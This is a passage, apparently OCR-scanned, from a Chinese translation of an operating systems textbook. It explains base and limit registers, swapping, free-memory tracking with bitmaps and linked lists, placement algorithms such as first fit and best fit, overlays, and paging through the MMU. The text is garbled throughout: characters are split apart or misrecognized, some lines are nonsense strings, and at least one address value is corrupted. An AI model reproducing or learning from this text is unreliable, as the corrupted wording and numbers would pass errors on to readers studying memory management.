地 把 每 个 进程 的 地 址 空间 映射 到 物理 内 存 的 不 同 部 分 。 从 CDC 
6600 (世界 上 最 早 的 超级 计算 机 〉 到 Intel 8088 (原始 IBM PC 的 心 
脏 ) ， 所 使 用 的 经 典 办 法 是 给 每 个 CPU 配置 两 个 特殊 硬件 寄存 器 ， 通 常 
叫做 基 址 寄存 器 和 界限 寄存 器 。 当 使 用 基 址 寄存 器 和 界限 寄存 器 时 ， 程 
序 装载 到 内 存 中 连续 的 空 闪 位置 且 装载 期 间 无 须 重 定位 ， 如 图 3-2c 所 
示 。 当 一 个 进程 运行 时 ， 程 序 的 起 始 物理 地 址 装载 到 基 址 寄存 器 中 ， 程 
序 的 长 度 装载 到 界限 寄存 器 中 。 在 图 3-2c 中 ， 当 第 一 个 程序 运行 时 ， 装 
载 到 这 些 人 硬件 寄存 器 中 的 基 址 和 界限 值 分 别 是 0 和 16 384。 当 第 二 个 程 
序 运行 时 ， 这 些 值 分 别 是 16 384 和 32 768。 如 果 第 三 个 16KB 的 程序 被 直 
接 装 载 在 第 二 个 程序 的 地 址 之 上 并 且 运 行 ， 这 时 基 址 寄存 器 和 界限 寄存 
器 里 的 值 会 是 32 768 和 16 384。 











每 次 一 个 进程 访问 内 存 ， 取 一 条 指令 ， 读 或 写 一 个 数据 字 ，CPU 硬 
件 会 在 把 地 址 发 送 到 内 存 总 线 前 ， 自 动 把 基 址 值 加 到 进程 发 出 的 地 址 值 
上 。 同 时 ， 它 检查 程序 提供 的 地 址 是 否 等 于 或 大 于 界限 寄存 器 里 的 值 。 
如 果 访 问 的 地 址 超过 了 界限 ， 生 错 误 并 中 止 访问 。 这 样 ， 对 图 3-2c 





中 第 二 个 程序 的 第 一 条 指令 ， 程 序 执行 


JMP 28 


重信， 但 是 硬件 把 这 条 指令 解释 成 为 





JMP 16412 


所 以 程序 如 我 们 所 愿 地 跳 转 到 了 CMP 指 令 。 在 图 3-2c 中 第 二 个 程序 
的 执行 过 程 中 ， 基 址 寄存 器 和 界限 寄存 器 的 设置 如 图 3-3 所 示 。 
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图 33 基 址 寄存 器 和 界限 寄存 器 可 用 于 为 每 个 进程 提供 一 个 独立 的 
地 址 空间 





使 用 基 址 寄存 器 和 界限 寄存 器 是 给 每 个 进程 提供 私有 地 址 空间 的 非 
第 容易 的 方法 ， 因 为 每 个 内 存 地 址 在 送 到 内 存 之 前 ， 都 会 目 动 先 加 上 基 





址 寄存 器 的 内 容 。 在 很 多 实际 系统 中 ， 对 基 址 寄存 器 和 前 限 寄存 器 会 以 
一 定 的 方式 加 以 保护 ， 使 得 只 有 操作 系统 可 以 修改 它们 。 在 CDC 6600 
中 就 提供 了 对 这 些 寄存 器 的 保护 ， 但 在 Intel 8088 中 则 没有 ， 甚 至 没有 界 
限 寄 存 右 。 但 是 ，Intel 8088 提 供 了 多 个 基 址 寄存 硕 ， 使 程序 的 代码 和 数 
据 可 以 被 独立 地 重 定位 ， 但 是 没有 提供 引用 地 址 越界 的 预防 机 制 。 











使 用 基 址 寄存 器 和 界限 寄存 器 重 定位 的 缺点 是 ， 每 次 访问 内 存 都 需 
要 进行 加 法 和 比较 运算 。 比 较 可 以 做 得 很 快 ， 但 是 加 法 由 于 进位 传递 时 
间 的 问题 ， 在 没有 使 用 特殊 电路 的 情况 下 会 显得 很 慢 。 








3.2.2 ”交换 技术 


如 果 计 算 机 物理 内 存 足够 大 ， 可 以 保存 所 有 进程 ， 那 么 之 前 提 及 的 
所 有 方案 都 或 多 或 少 是 可 行 的 。 但 实际 上 ， 所 有 进程 所 需 的 RAM 数 量 
总 和 通常 要 远 远 超出 存储 器 能 够 文 持 的 范围 。 在 一 个 典型 的 Windows 或 
Linux 系 统 中 ， 在 计算 机 完成 引导 后 ， 会 局 动 40 一 60 个 ， 甚 至 更 多 的 进 
程 。 例 如 ， 当 一 个 Windows 应 用 程序 安装 后 ， 通 常会 发 出 一 系列 命令 ， 
使 得 在 此 后 的 系统 引导 中 会 启动 一 个 仅仅 用 于 查看 该 应 用 程序 更 新 的 进 
程 。 这 样 一 个 进程 会 轻易 地 占据 5 一 10MB 的 内 存 。 其 他 后 台 进 程 还 会 查 
看 所 收 到 的 邮件 和 进来 的 网 络 连接 ， 以 及 其 他 很 多 诸如 此 类 的 任务 。 并 
且 ， 这 一 切 都 发 生 在 第 一 个 用 户 程序 启动 之 前 。 当 前 重要 的 应 用 程序 能 
轻易 地 占据 50 一 200MB 甚 至 更 多 的 空间 。 因 此 ， 把 所 有 进程 一 直 保 存在 
内 存 中 需要 巨大 的 内 存 ， 如 果 内 存 不 够 ， 就 做 不 到 这 一 点 。 














有 了 两 种 处 理 内 存 超载 的 通用 方法 。 最 简单 的 策略 是 交换 
(swapping) 技术 ， 即 把 一 个 进程 完整 调 入 内 存 ， 使 该 进程 运行 一 段 时 
间 ， 然 后 把 它 存 回 磁 盘 。 空 闲 进程 主要 存储 在 磁盘 上 ， 所 以 当 它们 不 运 
行 时 就 不 会 占用 内 存 〈 尽 管 它 们 的 一 些 进程 会 周期 性 地 被 唤醒 以 完成 相 
天 工作 ， 然 后 就 义 进 入 睡眠 状态 ) 。 另 一 种 策略 是 虚拟 内 存 (virtual 
memory) ， 该 策略 其 至 能 使 程序 在 只 有 一 部 分 梓 调 入 内 存 的 情况 下 运 
行 。 下 面 我 们 先 讨 论 交 换 技 术 ，3.3 节 我 们 将 考察 虚拟 内 存 。 











交换 系统 的 操作 如 图 3-4 所 示 。 开 始 时 内 存 中 只 有 进程 A。 之 后 创建 
进程 B 和 C 或 者 从 磁盘 将 它们 换 入 内 存 。 图 3-4d 显 示 A 被 交换 到 磁盘 。 然 
后 D 被 调 入 ，B 被 调 出 ， 最 后 A 再 次 被 调 入 。 由 于 A 的 位 置 发 生变 化 ， 所 
以 在 它 换 入 的 时 候 通 过 软件 或 者 在 程序 运行 期 间 (多 数 是 这 种 情况 ) 通 
过 硬件 对 其 地 址 进行 重 定位 。 例 如 ， 在 这 里 可 以 很 好 地 使 用 基 址 寄存 器 
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图 3-4 内 存 分 配 情况 随 着 进程 进出 而 变化 ， 阴 影 区域 表 示 未 使 用 的 
内 存 





交换 在 内 存 中 产生 了 多 个 空闲 区 (hole， 也 称 为 空洞 ) ， 通 过 把 所 
有 的 进程 尽 可 能 同 下 移动 ， 有 可 能 将 这 些小 的 空间 区 合成 一 大 块 。 该 拉 
术 称 为 内 存 紧 缩 (memory compaction) 。 这 个 操作 通常 不 进行 ， 因 为 
它 要 耗费 大 量 的 CPU 时 间 。 例 如 ， 一 台 有 1GB 内 存 的 计算 机 可 以 每 20ns 
复制 4 个 字 闻 ， 它 紧缩 全 部 内 存 大 约 要 花费 5s。 








有 一 个 问题 值得 注意 ， 即 当 进 程 被 创建 或 换 入 时 应 该 为 它 分 配 多 大 
的 内 存 。 知 进程 创建 时 其 大 小 是 固定 的 并 且 不 再 改变 ， 则 分 配 很 简单 ， 
操作 系统 准确 地 按 其 需要 的 大 小 进行 分 配 ， 不 多 也 不 少 。 





但 是 如 果 进 程 的 数据 段 可 以 增长 ， 例 如 ， 很 多 程序 设计 语言 都 允许 
从 堆 中 动态 地 分 配 内 存 ， 那 么 当 进 程 空间 试图 增长 时 ， 就 会 出 现 问 题 。 
右 该 进程 与 一 个 空闲 区 相 邻 ， 那 么 可 把 该 空 采 区 分 配给 该 进程 让 它 在 这 
个 空闲 区 增 大 。 必 一 方面 ， 知 进程 相 邻 的 是 另 一 个 进程 ， 那 么 要 么 把 需 
要 增长 的 进程 移 到 内 存 中 一 个 足够 大 的 区 域 中 去 ， 要 么 把 一 个 或 多 个 进 
程 交换 出 去 ， 以 便 生成 一 个 足够 大 的 空 几 区 。 夺 一 个 进程 在 内 存 中 不 能 
增长 ， 而 且 磁 盘 上 的 交换 区 也 已 满 了 ， 那 么 这 个 进程 只 有 挂 起 直到 一 些 
空间 空 亲 《或 者 可 以 结束 该 进程 ) 。 





如 末 大 部 分 进程 在 运行 时 都 要 增长 ， 为 了 减少 因 内 存 区 域 不 够 而 引 
起 的 进程 交换 和 移动 所 产生 的 开销 ， 一 种 可 用 的 方法 是 ， 当 换 入 或 移动 
进程 时 为 它 分 配 一 些 额外 的 内 存 。 然 而 ， 当 进程 被 换 出 到 磁盘 上 时 ， 应 
该 只 交换 进程 实际 上 使 用 的 内 存 中 的 内 容 ， 将 额外 的 内 存 交 换 出 去 是 一 
种 浪费 。 在 图 3-5a 中 读者 可 以 看 到 一 种 已 为 两 个 进程 分 配 了 增长 空间 的 
内 存 配置 。 
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a) b) 


图 3-5 为 可 能 增长 的 数据 段 预 留 空间 ; b) 为 可 能 增长 的 数据 段 和 堆 
栈 段 预 留 空间 


如 果 进 程 有 两 个 可 增长 的 段 ， 例 如 ， 供 变量 动态 分 配 和 释放 的 作为 
堆 使 用 的 一 个 数据 段 ， 以 及 存放 普通 局 部 变量 与 返回 地 址 的 一 个 堆栈 
段 ， 则 可 使 用 另 一 种 安排 ， 如 图 3-5b 所 示 。 在 图 中 可 以 看 到 所 示 进 程 的 
堆栈 段 在 进程 所 占 内 存 的 顶端 并 癌 下 增长 ， 紧 接 在 程序 段 后 面 的 数据 段 
癌 上 增长 。 在 这 两 者 之 间 的 内 存 可 以 供 两 个 段 使 用 。 如 有 果 用 完了 ， 进 程 
或 者 必须 移动 到 足够 大 的 空闲 区 中 【〈 它 可 以 被 交换 出 内 存 直到 内 存 中 有 
足够 的 空间 ) ， 或 者 结束 该 进程 。 





3.2.3 BAA Se 


在 动态 分 配 内 存 时 ， 操 作 系统 必须 对 其 进行 管理 。 一 般 而 言 ， 有 两 
种 方式 跟踪 内 存 使 用 情况 : 位 图 和 空闲 链表 。 下 面 我 们 将 介绍 这 两 种 方 
式 。 





1. 使 用 位 图 的 存储 管理 

使 用 位 图 方法 时 ， 内 存 可 能 被 划分 成 小 到 几 个 字 或 大 到 几 干 字 市 的 
分 配 单 元 。 每 个 分 配 单元 对 应 于 位 图 中 的 一 位 ，0 表 示 空 尊 ，1 表 示 占 用 
《或 者 相反 ) 。 一 块 内 存 区 和 其 对 应 的 位 图 如 图 3-6 所 示 。 
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图 3-6 习 一 段 有 5 个 进程 和 3 个 空闲 区 的 内 存 ， 刻 度 表 示 内 存 分 配 的 单 
元 ， 阴 影 区 域 表 示 空 有 《在 位 图 中 用 0 表示 ) ; b) 对 应 的 位 图 ; 用 空闲 
表 表 示 的 同样 的 信息 


分 配 单元 的 大 小 是 一 个 重要 的 设计 因素 。 分 配 单元 越 小 ， 位 图 越 
大 。 然 而 即使 只 有 4 个 字 节 大 小 的 分 配 单元 ，32 位 的 内 存 也 只 需要 位 图 
中 的 1 位 ;32n 位 的 内 存 需 要 n 位 的 位 图 ， 所 以 位 图 只 占用 了 1/33 的 内 
存 。 知 选择 比较 大 的 分 配 单 元 ， 则 位 图 更 小 。 但 知 进 程 的 大 小 不 是 分 配 
单元 的 整数 倍 ， 那 么 在 最 后 一 个 分 配 蛙 元 中 就 会 有 一 定数 量 的 内 存 被 浪 
HS o 

















因为 内 存 的 大 小 和 分 配 单 元 的 大 小 决定 了 位 图 的 大 小 ， 所 以 它 提供 
了 一 种 简单 的 利用 一 块 固定 大 小 的 内存 区 就 能 对 内 存 使 用 情况 进行 记录 
的 方法 。 这 种 方法 的 主要 问题 是 ， 在 决定 把 一 个 占 k 个 分 配 单元 的 进程 
调 入 内 存 时 ， 存 储 管理 器 必须 搜索 位 图 ， 在 位 图 中 找 出 有 k 个 连续 0 的 
品 。 查 找 位 图 中 指定 长 度 的 连续 0 串 是 耗 时 的 操作 (因为 在 位 图 中 该 串 
可 能 跨越 字 的 边界 ) ， 这 是 位 图 的 缺点 。 











2. 使 用 链表 的 存储 管理 








男 一 种 记录 内 存 使 用 情况 的 方法 是 ， 维 护 一 个 记录 已 分 配 内 存 段 和 
空 几 内 存 段 的 链表 。 其 中 链表 中 的 一 个 结 点 或 者 包含 一 个 进程 ， 或 者 是 
两 个 进程 间 的 一 个 空 的 空间 区 。 可 用 图 3-6c 所 示 的 段 链表 来 表示 图 3-6a 
所 示 的 内 存 布局 。 链 表 中 的 每 一 个 结 点 都 包含 以 下 域 : 空闲 区 CH) 或 
进程 (P) 的 指示 标志 、 起 始 地 址 、 长 度 和 指向 下 一 结 点 的 指针 。 


在 本 例 中 ， 段 链表 是 按照 地 址 排序 的 ， 其 好 处 是 当 进 程 终止 或 被 换 


出 时 链表 的 更 新 非常 直接 。 一 个 要 终止 的 进程 一 般 有 两 个 邻居 《除非 它 
是 在 内 存 的 最 底 端 或 最 顶端 ) ， 它 们 可 能 是 进程 也 可 能 是 空 尊 区， 这 束 
导致 了 图 3-7 所 示 的 四 种 组 合 。 在 图 3-7a 中 更 新 链表 需要 把 P 蔡 换 为 H; 
在 图 3-7b 和 图 3-7c 中 两 个 结 反 被 合并 成 为 一 个 ， 链 表 少 了 一 个 结 点 ; 在 
图 3-7d 中 三 个 结 反 被 合并 为 一 个 ， 从 链表 中 删除 了 两 个 结 点 。 
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图 3-7 结束 进程 X 时 与 相 令 区 域 的 四 种 组 合 





因为 进程 表 中 表示 终止 进程 的 结 点 中 通常 含有 指向 对 应 于 其 段 链 表 
结 点 的 指针 ， 因 此 段 链表 使 用 双 链 表 可 能 要 比 图 3-6c 所 示 的 单 链表 更 方 
便 。 这 样 的 结构 更 易于 找到 上 一 个 结 点 ， 并 检查 是 否 可 以 合并 。 








当 按 照 地 址 顺序 在 链表 中 存放 进程 和 空 亲 区 时 ， 有 几 种 算法 可 以 用 
来 为 创建 的 进程 “或 从 磁盘 换 入 的 已 存在 的 进程 ) 分 配 内 存 。 这 里 ， 假 
设 存储 管理 副 知 道 要 为 进程 分 配 的 多 大 的 内 存 。 最 简单 的 算法 是 首次 适 
配 〈first fit) 算法 。 存 储 管理 器 沿 痢 段 链 表 进 行 搜 索 ， 直 到 找到 一 个 足 





够 大 的 空 有 区， 除非 空 几 区 大 小 和 要 分 配 的 空间 大 小 正好 一 样 ， 否 则 将 
该 空 用 区 分 为 两 部 分 ， 一 部 分 供 进程 使 用 ， 男 一 部 分 形成 新 的 空 用 区 。 
首次 适 配 算法 是 一 种 速度 很 快 的 算法 ， 因 为 它 尽 可 能 少 地 搜索 链表 结 
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对 首次 适 配 算法 进行 很 小 的 修改 就 可 以 得 到 下 次 适 配 (next fit) 算 
法 。 它 的 工作 方式 和 首次 适 配 算法 相同 ， 不 同 点 是 每 次 找到 合适 的 空闲 
区 时 都 记录 当时 的 位 置 。 以 便 在 下 次 寻找 空 亲 区 时 从 上 次 结束 的 地 方 开 
始 搜索 ， 而 不 是 像 衣 次 适 配 算法 那样 每 次 都 从 头 开始 。Bays《〈1977) 的 
仿真 程序 证 明 下 次 适 配 算法 的 性 能 略 低 于 首次 适 配 算 法 。 

















为 一 个 著名 的 并 广泛 应 用 的 算法 是 最 佳 适 配 Chest fit) 算法 。 最 佳 
适 配 算法 搜索 整个 链表 〈 从 开始 到 结束 ) ， 找 出 能 够 容纳 进程 的 最 小 的 
空 几 区 。 最 佳 适 配 算法 试图 找 出 最 接近 实际 需要 的 空间 区 ， 以 最 好 地 区 
配 请 求 和 可 用 空 几 区 ， 而 不 是 先 拆 分 一 个 以 后 可 能 会 用 到 的 大 的 空闲 
区 。 














以 图 3-6 为 例 来 考察 首次 适 配 算法 和 最 佳 适 配 算法 。 假 如 需要 一 个 
大 小 为 2 的 块 ， 首 次 适 配 算法 将 分 配 在 位 置 5 的 空 几 区 ， 而 最 佳 适 配 算 法 
将 分 配 在 位 置 18 的 空闲 区 。 











因为 每 次 调用 最 佳 适 配 算法 时 都 要 搜索 整个 链表 ， 所 以 它 要 比 首 次 
适 配 算法 慢 。 让 人 感到 有 点 意外 的 是 它 比 首次 适 配 算法 或 下 次 适 配 算法 











浪费 更 多 的 内 存 ， 因 为 它 会 产生 大 量 无 用 的 小 空 几 区 。 一 般 情况 下 ， 首 
次 适 配 算法 生成 的 空 亲 区 更 大 一 些 。 


最 佳 适 配 的 空 亲 区 会 分 裂 出 很 多 非常 小 的 空 亲 区 ， 为 了 避免 这 一 问 
题 ， 可 以 考虑 最 差 适 配 〈worst fit) 算法 ， 即 总 是 分 配 最 大 的 可 用 空 朵 
区 ， 使 新 的 空 亲 区 比较 大 从 而 可 以 继续 使 用 。 仿 真 程序 表明 最 差 适 配 算 
法 也 不 是 一 个 好 主意 。 








如 果 为 进程 和 空闲 区 维护 各 自 独 立 的 链表 ， 那 么 这 四 个 算法 的 速度 
都 能 得 到 提高 。 这 样 就 能 集中 精力 只 检查 空闲 区 而 不 是 进程 。 但 这 种 分 
配 速度 的 提高 的 一 个 不 可 避免 的 代价 融 是 增加 复杂 上 度 和 内 存 释 放 速 度 变 
慢 ， 因 为 必须 将 一 个 回收 的 段 从 进程 链表 中 删除 并 插入 空间 区 链表 。 





如 末 进 程 和 空 闪 区 使 用 不 同 的 链表 ， 则 可 以 按照 大 小 对 空间 区 链表 
排序 ， 以 便 提 高 最 佳 适 配 算 法 的 速度 。 在 使 用 最 佳 适 配 算法 搜索 由 小 到 
大 排列 的 空 几 区 链表 时 ， 只 要 找到 一 个 合适 的 空 用 区 ， 则 这 个 空 用 区 区 
是 能 容纳 这 个 作业 的 最 小 的 空间 区 ， 因 此 是 最 佳 适 配 。 因 为 空 几 区 链表 
以 单 链表 形式 组 织 ， 所 以 不 需要 进一步 搜索 。 空 亲 区 链表 按 大 小 排序 
时 ， 首 次 适 配 算法 与 最 佳 适 配 算 法 一 样 快 ， 而 下 次 适 配 算法 在 这 里 则 坚 

意义 。 














在 与 进程 段 分 离 的 单独 链表 中 保存 空间 区 时 ， 可 以 做 一 个 小 小 的 优 
化 。 不 必 像 图 3-6c 那 样 用 单独 的 数据 结构 存放 空间 区 链表 ， 而 可 以 利用 





空闲 区 存储 这 些 信 息 。 每 个 空闲 区 的 第 一 个 字 可 以 是 空闲 区 大 小 ， 第 二 
个 字 指 向 下 一 个 空间 区 。 于 是 就 不 再 需要 图 3-6c 中 所 示 的 那些 三 个 字 加 
一 位 (P/H) 的 链表 结 点 了 。 





另 一 种 分 配 算法 称 为 快速 适 配 〈quick fit) 算法 ， 它 为 那些 常用 大 
小 的 空闲 区 维护 单独 的 链表 。 例 如 ， 有 一 个 n 项 的 表 ， 该 表 的 第 一 项 是 
指向 大 小 为 4KB 的 空闲 区 链表 表 头 的 指针 ， 第 二 项 是 指向 大 小 为 8KB 的 
空闲 区 链表 表 头 的 指针 ， 第 三 项 是 指向 大 小 为 12KB 的 空闲 区 链表 表 头 
的 指针 ， 以 此 类 推 。 像 21KB 这 样 的 空闲 区 既 可 以 放 在 20KB 的 链表 中 ， 
也 可 以 放 在 一 个 专门 存放 大 小 比较 特别 的 空闲 区 的 链表 中 。 


3.3 ”虚拟 内 存 


尽管 基 址 寄存 器 和 界限 寄存 器 可 以 用 于 创建 地 址 空间 的 抽象 ， 还 有 
另 一 个 问题 需要 解决 : 管理 软件 的 膨胀 bloatware) 。 虽 然 存储 器 容量 
增长 快速 ， 但 是 软件 大 小 的 增长 更 快 。 在 20 世 纪 80 年 代 ， 许 多 大 学 用 一 
台 4MB 的 VAX 计 算 机 运行 分 时 操作 的 系统 ， 供 十 几 个 用 户 (已 经 或 多 
或 少 足 够 满足 需要 了 ) 同时 运行 。 现 在 微软 公司 为 单 用 户 Vista 系 统 推荐 
至 少 512MB 内 存 ， 并 且 只 能 运行 简单 的 应 用 程序 ， 如 果 运 行 复 杂 应 用 程 
序 则 要 1GB 内 存 。 而 多 媒体 的 潮流 则 进一步 推动 了 对 内 存 的 需求 。 














这 一 发 展 的 结果 是 ， 需 要 运行 的 程序 往往 大 到 内 存 无 法 容纳 ， 而 且 
必然 需要 系统 能 够 支持 多 个 程序 同时 运行 ， 即 使 内 存 可 以 满足 其 中 单独 
一 个 程序 的 需要 ， 但 总 体 来 看 ， 它 们 仍然 超出 了 内 存 大 小 。 交 换 技术 
(swapping) 并 不 是 一 个 有 吸引 力 的 解决 方案 ， 因 为 一 个 典型 的 SATA 
磁盘 的 峰值 传输 率 最 高 达到 100MB/s， 这 意味 着 至 少 需要 10 秒 才能 换 出 
一 个 1GB 的 程序 ， 并 需要 另 一 个 10 秒 才能 再 将 一 个 1GB 的 程序 换 入 。 














程序 大 于 内 存 的 问题 早 在 计算 时 代 开 始 就 产生 了 ， 虽 然 只 是 有 限 的 
应 用 领域 ， 像 科学 和 工程 计算 模拟 宇宙 的 创建 或 模拟 新 型 航空 器 都 会 
ERKENT) 。 在 20 世 纪 60 年 代 所 采取 的 解决 方法 是 : 把 程序 分 割 成 
FSRR, BRAM tt Coverlay) 。 程 序 开始 执行 时 ， 将 履 兰 管理 模块 闭 
AAF, BERRIRA ZITEN. MTER, mN E 








理 模 块 装 入 履 盖 1， 或 者 占用 敢 症 0 的 上 方位 置 〈《 如 果 有 空间 ) ， 或 者 占 
HEO MRKA TH) 。 一 些 履 关系 统 非常 复杂 ， 人 允许 多 个 上 履 凋 块 
同时 在 内 存 中 。 秦 盖 块 存放 在 磁盘 上 ， 在 需要 时 由 操作 系统 动态 地 换 入 
换 出 。 





里 然 由 系统 完成 实际 的 窗 荔 块 换 入 换 出 操作 ， 但 是 程序 员 必 须 把 程 
序 分 割 成 多 个 片段 。 把 一 个 大 程序 分 割 成 小 的 、 模 块 化 的 片段 是 非常 费 
时 和 枯燥 的 ， 并 且 易 于 出 错 。 很 少 程序 员 擅 长 使 用 乾 凋 技术 。 因 此 ， 没 
过 多 久 束 有 人 找到 一 个 办 法 ， 把 全 部 工作 都 交 给 计算 机 去 做 。 


采用 的 这 个 方法 (Fotheringham，1961) 称 为 虚拟 内 存 (virtual 
memory) 。 虚 拟 内 存 的 基本 思想 是 : 每 个 程序 拥有 自己 的 地 址 空间 ， 
这 个 空间 被 分 割 成 多 个 块 ， 每 一 块 称 作 一 页 或 页 面 (page) 。 每 一 页 有 
连续 的 地 址 范围 。 这 些 页 被 映射 到 物理 内 存 ， 但 并 不 是 所 有 的 页 都 必须 
在 内 存 中 才能 运行 程序 。 当 程序 引用 到 一 部 分 在 物理 内 存 中 的 地 址 空间 
时 ， 由 硬件 立刻 执行 必要 的 映射 。 当 程序 引用 到 一 部 分 不 在 物理 内 存 中 
的 地 址 空间 时 ， 由 操作 系统 负责 将 缺失 的 部 分 装 入 物理 内 存 并 重新 执行 
失败 的 指令 。 








从 东 个 角度 来 讲 ， 虚 拟 内 存 是 对 基 址 寄存 磺 和 界限 寄存 器 的 一 种 综 
合 。8088 为 正文 和 数据 分 离 出 专门 的 基 址 寄存 器 《但 不 包括 界限 寄存 
ait) 。 而 虚拟 内 存 使 得 整个 地 址 空间 可 以 用 相对 较 小 的 单元 映射 到 物理 
内 存 ， 而 不 是 为 正文 段 和 数据 段 分 别 进 行 重 定 位 。 下 面 会 介绍 虚拟 内 存 








是 如 何 实 现 的 。 





虚拟 内 存 很 适合 在 多 道 程序 设计 系统 中 使 用 ， 许 多 程序 的 片段 同时 
保存 在 内 存 中 。 当 一 个 程序 等 待 它 的 一 部 分 读 入 内 存 时 ， 可 以 把 CPU 交 
给 另 一 个 进程 使 用 。 


3.3.1 分 页 
大 部 分 虚拟 内 存 系统 中 都 使 用 一 种 称 为 分 页 (paging) 的 技术 ， 我 


们 现在 就 介绍 这 一 技术 。 在 任何 一 台 计 算 机 上 ， 程 序 引 用 了 一 组 内 存 地 
址 。 当 程序 执行 指令 








MOV REG, 1000 





时 ， 它 把 地 址 为 1000 的 内 存单 元 的 内 容 复 制 到 REG 中 (或 者 相反， 
这 取决 于 计算 机 的 型 号 ) 。 地 址 可 以 通过 索引 、 基 址 寄存 器 、 段 寄存 器 
或 其 他 方式 产生 。 





由 程序 产生 的 这 些 地 址 称 为 虚拟 地 址 〈virtual address) ， 它 们 构成 
了 一 个 虚拟 地 址 空间 (virtual address space) 。 在 没有 虚拟 内 存 的 计算 
机 上 ， 系 统 直 接 将 虚拟 地 址 送 到 内 存 总 线 上 ， 读 写 操作 使 用 具有 同样 地 
址 的 物理 内 存 字 ， 而 在 使 用 虚拟 内 存 的 情况 下 ， 虚 拟 地 址 不 是 被 直接 送 
到 内 存 总 线 上 ， 而 是 被 送 到 内 存 管理 单元 (Memory Management Unit, 


MMU) ，MMU 把 虚拟 地 址 映射 为 物理 内 存 地 址 ， 如 图 3-8 所 示 。 


CPU 发 送 虚 拟 地 址 给 MMU 
CPU 包 


内 存 管理 | 存储 器 


单元 





MMU 发 送 物理 地 址 
给 存储 器 
图 3-8 MMU 的 位 置 和 功能 。 这 里 MMU 作 为 CPU 芯 片 的 一 部 分 ， 因 为 
通常 就 是 这 样 做 的 。 不 过 从 逻辑 上 看 ， 它 可 以 是 一 片 单 独 的 芯片 ， 并 且 
早 就 已 经 这 样 了 


图 3-9 中 一 个 简单 的 例子 说 明了 这 种 映射 是 如 何 工 作 的 。 在 这 个 例 
子 中 ， 有 一 台 可 以 产生 16 位 地 址 的 计算 机 ， 地 址 范围 从 0 到 64K， 且 这 
些 地 址 是 虚拟 地 址 。 然 而 ， 这 全 计算 机 只 有 32KB 的 物理 内 存 ， 因 此 ， 
虽然 可 以 编写 64KB 的 程序 ， 但 它们 却 不 能 被 完全 调 入 内 存 运 行 。 在 磁 
盘 上 必须 有 一 个 可 以 大 到 64KB 的 程序 核心 映像 的 完整 副本 ， 以 保证 程 
序 请 段 在 需要 时 能 被 调 入 内 存 。 


虚拟 地 















址 空间 
60K 一 64K 
56K ~60K 上 虚拟 页 面 
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ee ae pos 16K ~20K 
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图 3-9 页 表 给 出 虚拟 地 址 与 物理 内 存 地 址 之 间 的 映射 关系 。 每 一 页 
起 始 于 4096 的 倍数 人 位置， 结束 于 起 址 加 4095， 所 以 4 区 到 8 区 实际 为 4096 一 


8191; 8K 2)12K 3% 8192 ~ 12287 





虚拟 地 址 空间 按照 固定 大 小 划分 成 称 为 页 面 Cpage) Fart. 
在 物理 内 存 中 对 应 的 单元 称 为 页 框 (page frame) 。 页 面 和 页 框 的 大 小 
通常 是 一 样 的 ， 在 本 例 中 是 4KB， 现 有 的 系统 中 常用 的 页 大 小 一 般 从 


512 字 节 到 64KB。 对 应 于 64KB 的 虚拟 地 址 空间 和 32KB 的 物理 内 存 ， 我 
们 得 到 16 个 虚拟 页 面 和 8 个 页 框 。RAM 和 磁盘 之 间 的 交换 总 是 以 整个 页 
面 为 单元 进行 的 。 





图 3-9 中 的 标记 符号 如 下 : 标记 OK 一 4K 的 范围 表示 该 页 的 虚拟 地 址 
或 物理 地 址 是 0 一 4095。4K 一 8K 的 范围 表示 地 址 4096 一 8191， 等 等 。 
一 页 包含 了 4096 个 地 址 ， 起 始 于 4096 的 整数 倍 位 置 ， 结 束 于 4096 倍 数 缺 
i 





当 程序 试图 访问 地 址 0 时 ， 例 如 执行 下 面 这 条 指令 





[EE | 
MOV REG, 0 
[ee | 


将 虚拟 地 址 0 送 到 MMU。MMU 看 到 虚拟 地 址 落 在 页 面 0 o~ 
4095) ， 根 据 其 映射 结果 ， 这 一 页 面 对 应 的 是 页 框 2 (8192~12 
287) ， 因 此 MMU 把 地 址 变换 为 8192， 并 把 地 址 8192 送 到 总 线 上 。 内 存 
对 MMU 一 无 所 知 ， 它 只 看 到 一 个 读 或 写 地 址 8192 的 请 求 并 执行 它 。 
MMU 从 而 有 效 地 把 所 有 从 0 一 4095 的 虚拟 地 址 映射 到 了 8192 一 12 287 的 
物理 地 址 。 


同样 地 ， 指 令 





1 
MOV REG, 8192 
A 


被 有 效 地 转换 为 : 


MOV REG, 24576 








因为 虚拟 地 址 8192《〈《 在 虚拟 页 面 2 中 ) 被 映射 到 物理 地 址 24 
567《〈 在 物理 页 框 6 中 ) 上 。 第 三 个 例子 ， 虚 拟 地 址 20 500 在 距 虚 拟 页 面 
5〔 虚 拟 地 址 20 480 一 24 575) 起 始 地 址 20 字 节 处 ， 并 且 被 映射 到 物理 地 
址 12 288+20=12 308. 


通过 恰当 地 设置 MMU， 可 以 把 16 个 虚拟 页 面 映射 到 8 个 页 框 中 的 任 
何 一 个 。 但 是 这 并 没有 解决 虚拟 地 址 空间 比 物理 内 存 大 的 问题 。 在 图 3- 
9 中 只 有 8 个 物理 页 框 ， 于 是 只 有 8 个 虚拟 页 面 被 映射 到 了 物理 内 存 中 ， 
在 图 3-9 中 用 又 号 表示 的 其 他 页 并 疫 有 被 映射 。 在 实际 的 硬件 中 ， 用 一 
个 “在 /不 在 ”位 Cpresent/absent bit) 记录 页 面 在 内 存 中 的 实际 存在 情况 。 








当 程序 访问 了 一 个 未 映射 的 页 面 ， 例 如 执行 指令 








MOV REG, 32780 


将 会 发 生 什 么 情况 呢 ? 虚拟 页 面 8〈 从 32 768 开 始 ) 的 第 12 个 字 节 
所 对 应 的 物理 地 址 是 什么 呢 ? MMU 注 意 到 该 页 面 没 有 被 映射 〈 在 图 中 
用 又 号 表示 ) ， 于 是 使 CPU 陶 入 到 操作 系统 ， 这 个 陷阱 称 为 缺 页 中 断 
(page fault) 。 操 作 系 统 找 到 一 个 很 少 使 用 的 页 框 且 把 它 的 内 容 写 入 磁 
盘 〈 如 果 它 不 在 磁盘 上 ) 。 随 后 把 需要 访问 的 页 面 读 到 刚才 回收 的 页 框 








中 ， 修 改 映 射 关系 ， 然 后 重新 启动 引起 陷阱 的 指令 。 


例如 ， 如 果 操 作 系 统 决 定 放 弃 页 杠 1， 那 么 它 将 把 虚拟 页 面 8 装 入 物 
理 地 址 8192， 并 对 MMU 了 映射 做 两 处 修改 。 首 先 ， 它 要 标记 虚拟 页 面 1 表 
项 为 未 映射 ， 使 以 后 任何 对 虚拟 地 址 4096 一 8191 的 访问 都 导致 陷阱 。 随 
